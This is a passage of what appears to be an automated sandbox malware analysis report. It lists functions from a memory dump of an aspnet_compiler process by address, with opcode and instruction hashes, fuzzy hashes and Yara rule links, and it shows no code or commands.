                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 16eb1e9227c9ca53ee971aeba792c6b4be561f846bb8a1c766c052503132072f
                                                                                                        • Instruction ID: 26d681064e59ba3c9d27d15f9eada5a1bcbd6eef5e1741adcbdb475bb6397067
                                                                                                        • Opcode Fuzzy Hash: 16eb1e9227c9ca53ee971aeba792c6b4be561f846bb8a1c766c052503132072f
                                                                                                        • Instruction Fuzzy Hash: 48118E32401A029FDB229E15C880B22F7E4BF5077AF15886DD6994A4A6C374E880CB10
                                                                                                        Function 017BD1D0 Relevance: .0, Instructions: 47COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 2103513d2fbd223765d54b27d59d1ce24549dd4e977acd5ce3c70b0a80ca45ab
                                                                                                        • Instruction ID: 332bf90bff1acc20d42173ef65583cf8f201912d0da04f2769d325b831e50455
                                                                                                        • Opcode Fuzzy Hash: 2103513d2fbd223765d54b27d59d1ce24549dd4e977acd5ce3c70b0a80ca45ab
                                                                                                        • Instruction Fuzzy Hash: 13014772A085849BDB219B98E840FE6F7A9EB84B38F104159FE158B380EB34D940C791
                                                                                                        Function 017A33A5 Relevance: .0, Instructions: 47COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 5807426d3854de8340053ba828383e613f6f2126caef2cc0c9319ce74fae2529
                                                                                                        • Instruction ID: bf71ad435fe608180bd95f142a5d6f3bd9cb4e072e6aec757a756ea96453aa03
                                                                                                        • Opcode Fuzzy Hash: 5807426d3854de8340053ba828383e613f6f2126caef2cc0c9319ce74fae2529
                                                                                                        • Instruction Fuzzy Hash: 1D01D136300105ABCF129EAADC44EABFFACBFC5650B144529BA06DB220EA34DD42C760
                                                                                                        Function 0183F5BE Relevance: .0, Instructions: 47COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 036d74db3c94e76e6d869ecacd14549a10cc76cd84bce114b8183a7e2235d31e
                                                                                                        • Instruction ID: 0f7a7d988aa72a703dfce27306595e0a64730de0fbf60ddccd2d83fbb7c56b83
                                                                                                        • Opcode Fuzzy Hash: 036d74db3c94e76e6d869ecacd14549a10cc76cd84bce114b8183a7e2235d31e
                                                                                                        • Instruction Fuzzy Hash: 7B017171A00249EFDB14EFA9D855FEEBBF8EF44704F04446ABA00EB290D674DA41CB95
                                                                                                        Function 0183F453 Relevance: .0, Instructions: 47COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 60ad5bd81e7debbfbdabab7f1e38988a41307fc95436d332005be736874dea79
                                                                                                        • Instruction ID: 2729c42b66e908049d69dd7028cf1f6988631ad273d24d8b7148805c5f273ada
                                                                                                        • Opcode Fuzzy Hash: 60ad5bd81e7debbfbdabab7f1e38988a41307fc95436d332005be736874dea79
                                                                                                        • Instruction Fuzzy Hash: 0F019E71A00249ABCB14EF69D845FAEBBB8EF84714F04402ABA00EB280D674DA41CB95
                                                                                                        Function 0179E016 Relevance: .0, Instructions: 46COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                        • Instruction ID: 50460adacf6180da46ca3a4a6e4f87a1cd0ade287500868de1105fe8ec1ae6cc
                                                                                                        • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                        • Instruction Fuzzy Hash: 64018F32204584DFE726C71DDA48F36FBE8EF45794F1904A1FA05CB691EA38DC40C661
                                                                                                        Function 0177826B Relevance: .0, Instructions: 46COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: f9098340cdb1bb7e1fefc2e5daf1fab4c8851ef24990368a2e1d04921bc306d0
                                                                                                        • Instruction ID: a51c77a8209828e6d87ac93fe58767432dc10535812a6d71c03e8e992da46bf6
                                                                                                        • Opcode Fuzzy Hash: f9098340cdb1bb7e1fefc2e5daf1fab4c8851ef24990368a2e1d04921bc306d0
                                                                                                        • Instruction Fuzzy Hash: 120184316045099BDB14DB69DC4C9AAFBB9EF85720F1540699D01EB684EE20DA01C692
                                                                                                        Function 0183F367 Relevance: .0, Instructions: 45COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 5c95e9fc6a046b09580dc7496d0a01b2f20c20fe8a0c7d7430b9b257e78f1209
                                                                                                        • Instruction ID: efed0551104b57951abbe88af9e10fd7d58e550bfb6bb90ec775af48ec04801a
                                                                                                        • Opcode Fuzzy Hash: 5c95e9fc6a046b09580dc7496d0a01b2f20c20fe8a0c7d7430b9b257e78f1209
                                                                                                        • Instruction Fuzzy Hash: 02018471A00259EBDB10EBA9D859FAFBBB8EF94704F04406AB501EB280D674DA00C794
                                                                                                        Function 01782582 Relevance: .0, Instructions: 45COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: a8c9d65435b73452097145c96de55d982d85c89e78f0c73e48ef3e3e06b88e8c
                                                                                                        • Instruction ID: 729205f0519fa6a3654c955d108cf2812e120d90caff0629dbf8b50c2ab1f52c
                                                                                                        • Opcode Fuzzy Hash: a8c9d65435b73452097145c96de55d982d85c89e78f0c73e48ef3e3e06b88e8c
                                                                                                        • Instruction Fuzzy Hash: 83F0F932681A10B7C7319B5A8C44F07FAA9EB84B91F144069E60597640C670DD01C6B0
                                                                                                        Function 01855152 Relevance: .0, Instructions: 43COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 028c249cd0ba4e6ebdd9da7a58a247c0d8b79b97278eed4440696ad5e2a8f353
                                                                                                        • Instruction ID: 69ecb2153bab621d7fe2b9b3843ee3ba7d084f6e4dce59bbb8f3edaa7ae33ed6
                                                                                                        • Opcode Fuzzy Hash: 028c249cd0ba4e6ebdd9da7a58a247c0d8b79b97278eed4440696ad5e2a8f353
                                                                                                        • Instruction Fuzzy Hash: 8B012C71A1060DABDB00DFA9D9559EEBBF8FF58704F10405AE901E7350D734EA018BA0
                                                                                                        Function 017AC073 Relevance: .0, Instructions: 43COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                        • Instruction ID: 3e3fccbc149def7af1529b8ad23c2ef88b09f858b39f6461c0b0c91902113d53
                                                                                                        • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                        • Instruction Fuzzy Hash: 5EF0C2B2600A11ABD325CF4DDC40E57FBEADBD5B80F048129A645CB320EA31DD04CB90
                                                                                                        Function 018550D9 Relevance: .0, Instructions: 43COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4b144fee8e302da9bd7a44c91ba9830cd212b1862176d061d079db00ed1b33d0
                                                                                                        • Instruction ID: 47ec1b02f1093cc320cf776cc1f9c9f1f9ea0280b727a3e8688d44db633a714e
                                                                                                        • Opcode Fuzzy Hash: 4b144fee8e302da9bd7a44c91ba9830cd212b1862176d061d079db00ed1b33d0
                                                                                                        • Instruction Fuzzy Hash: 58012CB1A0020DABDB00DFA9D9559EEBBF8FF59744F50405AE901F7390E674EA018BA0
                                                                                                        Function 01855060 Relevance: .0, Instructions: 43COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 3d139a8f84bdcb550a027a5548d8129261062d0e6c1b8bcb6e62c612f5573554
                                                                                                        • Instruction ID: 3171054373106173f630aa8bbdf33dfeb35ee351710596bc31b8ac882a3b234d
                                                                                                        • Opcode Fuzzy Hash: 3d139a8f84bdcb550a027a5548d8129261062d0e6c1b8bcb6e62c612f5573554
                                                                                                        • Instruction Fuzzy Hash: 97012C71A1020DABCB04DFA9D9959EEBBF8FF58714F10405AF901E7351D634EA418BA0
                                                                                                        Function 0177C310 Relevance: .0, Instructions: 43COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                        • Instruction ID: 9e56693ba297bfe2c008b1c31abc7e88710034b5ffd1986799cb0b4c6374b00c
                                                                                                        • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                        • Instruction Fuzzy Hash: 92F0FC33304A239BDF3316A95C44B3BE9959FD9A64F190035E7199B244C9648E0156D2
                                                                                                        Function 01855537 Relevance: .0, Instructions: 43COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4c7214c07e2d47acdf30c8ad2cd8abe64377b7c52b5a775f25a42b7b733d5d35
                                                                                                        • Instruction ID: 7ec812d2aad47be6125b24696776d7c80efe7e83fbf4f2d0f7ba3f1603aa4e59
                                                                                                        • Opcode Fuzzy Hash: 4c7214c07e2d47acdf30c8ad2cd8abe64377b7c52b5a775f25a42b7b733d5d35
                                                                                                        • Instruction Fuzzy Hash: 86110970A1024ADFDB44DFA9D555AADFBF4FF08704F04426AE909EB382E634DA418B90
                                                                                                        Function 018561E5 Relevance: .0, Instructions: 41COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0739ce39e09f5d6752240038e7d37c1cc72ceff38fb0ef33def618a44503e3a1
                                                                                                        • Instruction ID: 9ac65613f759d1e9ef23e457c5cdbd36bbe1b1f57884bdb2d5cabcc518b2bf5e
                                                                                                        • Opcode Fuzzy Hash: 0739ce39e09f5d6752240038e7d37c1cc72ceff38fb0ef33def618a44503e3a1
                                                                                                        • Instruction Fuzzy Hash: C1018F71A002499BCB00DFA9D855AEEBBF8FF58714F14405EE901EB280E734EA01CB94
                                                                                                        Function 0183F2F8 Relevance: .0, Instructions: 41COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 09a248a6d1ca77e5f565f2b03f52145557067ed977208658029e4ade031c7a6a
                                                                                                        • Instruction ID: 7482bbe4e59c8d9e822832ef2bacc186c670478e50e7fe72290d2cad35e5447e
                                                                                                        • Opcode Fuzzy Hash: 09a248a6d1ca77e5f565f2b03f52145557067ed977208658029e4ade031c7a6a
                                                                                                        • Instruction Fuzzy Hash: F3F0C872F10248ABDB14DFB9D819AEEF7B8EF44710F04805AE501EB290DA74DA018791
                                                                                                        Function 017B724D Relevance: .0, Instructions: 40COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 44620c8b90c707c3135ebb5afdba643e124f7b09bfea536c61b6b3c3b840e391
                                                                                                        • Instruction ID: d5418837a6a11a52064274444ce239948ba122731a3b6e3272fb6963be0d76da
                                                                                                        • Opcode Fuzzy Hash: 44620c8b90c707c3135ebb5afdba643e124f7b09bfea536c61b6b3c3b840e391
                                                                                                        • Instruction Fuzzy Hash: 69F0F671A05256ABEF18D7AC8980FEAFBB8DFD0720F0881A5FE01D7285D730EA40C650
                                                                                                        Function 0180A4B0 Relevance: .0, Instructions: 40COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d332261e1a42b7e062c81e9daf311fa88009676ea54d70e64355b253a2d32371
                                                                                                        • Instruction ID: 6e9a6cfd5f9ef12ea15ed0e0f0d211d6480d2f1c3c9714f461cae2448b9a3072
                                                                                                        • Opcode Fuzzy Hash: d332261e1a42b7e062c81e9daf311fa88009676ea54d70e64355b253a2d32371
                                                                                                        • Instruction Fuzzy Hash: A601853650020DABCF129E88DC44EDA7F66FB4C764F068111FE18A6260C336DA70EF81
                                                                                                        Function 0177C0F0 Relevance: .0, Instructions: 39COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: df7665cc7f0559a444f6a366e8311fa2b475b2e77cc1a57d3c36f213a9bf8c8a
                                                                                                        • Instruction ID: 015eb8baa6c4ce0ad61e6e97ae865fd955a0af42395c9e51457aa57137c1d93f
                                                                                                        • Opcode Fuzzy Hash: df7665cc7f0559a444f6a366e8311fa2b475b2e77cc1a57d3c36f213a9bf8c8a
                                                                                                        • Instruction Fuzzy Hash: BDF024B23082425BFB569619AC01B22F79AE7C8655F69807AEB058B2C1F9B0DC01C3A4
                                                                                                        Function 018553FC Relevance: .0, Instructions: 39COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e006bef64795139802744e818f7a0ee7c5a18189c543fe65eeea1c620859ee8b
                                                                                                        • Instruction ID: 2429ab5e0cce0ba044f31a928844ba179d782faf9e12843cb4f810f2387bd8bc
                                                                                                        • Opcode Fuzzy Hash: e006bef64795139802744e818f7a0ee7c5a18189c543fe65eeea1c620859ee8b
                                                                                                        • Instruction Fuzzy Hash: A30121B0E0020ADFDB44DFA9D555B9EFBF4FF08305F148169A519EB381D634DA408B90
                                                                                                        Function 017B656A Relevance: .0, Instructions: 39COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: eba130ce19a647dc4e41015be9ccda38abf8720ecc6eb6604ee75078d4901347
                                                                                                        • Instruction ID: ff4eb33f49dbbcf97b0a331fce016e9f7c221a5206641796fb022de3895bb477
                                                                                                        • Opcode Fuzzy Hash: eba130ce19a647dc4e41015be9ccda38abf8720ecc6eb6604ee75078d4901347
                                                                                                        • Instruction Fuzzy Hash: 9301A4702056819BF7229B3CCD8CF66BBA4FF40B44F5801A4BB02DB6D6E728D5418610
                                                                                                        Function 0182437C Relevance: .0, Instructions: 37COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                        • Instruction ID: 609886ae59567c9786be10914822d7b8c18d421268a5a4598daa561778d8f207
                                                                                                        • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                        • Instruction Fuzzy Hash: DDF0E93134193347EB37AA2DD428F2BA655AFD0F00B05052CDE02CB640DF60DD8087A0
                                                                                                        Function 0183F3E6 Relevance: .0, Instructions: 35COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 656f352fdb45ad0697957937bf555f7b72e0b054d45aada901828c1a9ccb90af
                                                                                                        • Instruction ID: 870a1ff37f3499926e3bd6da6a55f2a9ab804650618d53f7220bc2e205f84f0c
                                                                                                        • Opcode Fuzzy Hash: 656f352fdb45ad0697957937bf555f7b72e0b054d45aada901828c1a9ccb90af
                                                                                                        • Instruction Fuzzy Hash: DEF0AF71E0020DAFCB04EFA8D549A9EB7F4FF48300F408069B905EB381D634DA40CB94
                                                                                                        Function 017792FF Relevance: .0, Instructions: 35COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 32fe1bb4dea6e080dbd08ecd7aa7f45717f96f1423adfe41bf98d3a5c20225aa
                                                                                                        • Instruction ID: 560a6667173d733eb966ec98cf8fa56d2ab98220b0a844dccee4d737e3e59e9f
                                                                                                        • Opcode Fuzzy Hash: 32fe1bb4dea6e080dbd08ecd7aa7f45717f96f1423adfe41bf98d3a5c20225aa
                                                                                                        • Instruction Fuzzy Hash: 3DF0FA32200640ABDB31AB19DC08F9AFBFDEF84B24F08051DE646830A0C6A0E908CB60
                                                                                                        Function 018555C9 Relevance: .0, Instructions: 35COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d0177739a1bdfd9ff3a2886266c59b5835bfcca2c32785b8c45c2183f0d650a2
                                                                                                        • Instruction ID: 7b233d1f30cdddf5bcbc31b08a5da9b9a03d46d318fe5ac60c92ebbb719d809c
                                                                                                        • Opcode Fuzzy Hash: d0177739a1bdfd9ff3a2886266c59b5835bfcca2c32785b8c45c2183f0d650a2
                                                                                                        • Instruction Fuzzy Hash: 13F03C74A00249AFDB04EFA8E559AAEB7F4EF18704F108459B905EB390D674DA00CB64
                                                                                                        Function 01840115 Relevance: .0, Instructions: 32COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: dbcf22e3da82243d6c508f6e5407e7aa3335fae9d6ae36134d7657288dab512e
                                                                                                        • Instruction ID: 09c2a6ed61c05f61ed8b44502d5965b9d176e1287e4cef1301f918163193e3ee
                                                                                                        • Opcode Fuzzy Hash: dbcf22e3da82243d6c508f6e5407e7aa3335fae9d6ae36134d7657288dab512e
                                                                                                        • Instruction Fuzzy Hash: E7F02766415E888BDF326B3C64583D26B54A792310F291445DAA2D7206D974C783CB62
                                                                                                        Function 0185539D Relevance: .0, Instructions: 31COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 77654cf12fd20a492b3ea4f6a1b46a4c33c9b6302e102611f0c85a0b010f7f6f
                                                                                                        • Instruction ID: fee51e0a94db74f1a72a7a84581fc6bc5a72f16769dca6bfb103fb0c9ed35a16
                                                                                                        • Opcode Fuzzy Hash: 77654cf12fd20a492b3ea4f6a1b46a4c33c9b6302e102611f0c85a0b010f7f6f
                                                                                                        • Instruction Fuzzy Hash: C9F0E270A1024DAFDB04EFB8D459FAEB7F4EF18704F108098E906EB295DA74DA01CB54
                                                                                                        Function 01855283 Relevance: .0, Instructions: 31COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 7ed9c018de4d223fbc9046726d5a0f45887aae37937f5853e2ea877f163fc8ed
                                                                                                        • Instruction ID: 1f656aa834150b8c1e1c087e999c0e80f10a69a862e3162d276ed0fc9f9802a4
                                                                                                        • Opcode Fuzzy Hash: 7ed9c018de4d223fbc9046726d5a0f45887aae37937f5853e2ea877f163fc8ed
                                                                                                        • Instruction Fuzzy Hash: 02F0BE70A10209ABDB04EBB8E919EAEB7F4FF14704F004458B901EB285EA34DA008B50
                                                                                                        Function 018552E2 Relevance: .0, Instructions: 31COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: f482f873529447103f6f7a09c7f6a8918239380f1a6f39fb4aa442bab694f03a
                                                                                                        • Instruction ID: 5c8aa7b2648cbb5b490f557efb49b67610bbf426249bb49dabd5960ba8d9694e
